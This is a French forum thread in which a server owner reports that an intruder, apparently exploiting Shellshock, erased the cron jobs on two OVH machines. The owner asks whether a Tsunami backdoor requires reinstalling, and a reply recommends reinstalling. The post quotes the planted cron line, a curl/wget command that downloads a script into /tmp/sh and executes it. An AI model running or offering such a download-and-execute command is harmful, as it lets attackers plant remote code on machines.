Hello
A moins de savoir exactement ce qu'il a pu faire sur ta machine, il vaut mieux la réinstaller en effet...
T'es pas à l'abri qu'il ait installer d'autres choses sans que tu t'en sois aperçu
Bonsoir,
il y a peu, j'ai découvert sur 2 machines qui tournent sous la Release 2 d'ovh un scénario bien triste, toutes les tâches CRON ont été effacées puis une seule a été ajoutée, dont voici le contenu :
curl -o /tmp/sh URL/bots/regular.bot;wget URL/bots/regular.bot -O /tmp/sh;sh /tmp/sh
(j'ai du masquer l'URL du a ma récente inscription au forum qui me limite)
Après une petite recherche sur google, je tombe sur un article "shellshock-hello-honeypot" qui me donne toutes les informations pour comprendre ce qui s'est passé. Effectivement, même si elle est désormais faite depuis quelques jours, je n'avais pas encore fait la mise à jour de bash à ce moment là.
Pour ce qui est de bash, j'ai fait la mise à jour, mais pour ce qui est du backdoor Tsunami, que faire ? Suis-je obligé de réinstaller la machine ?
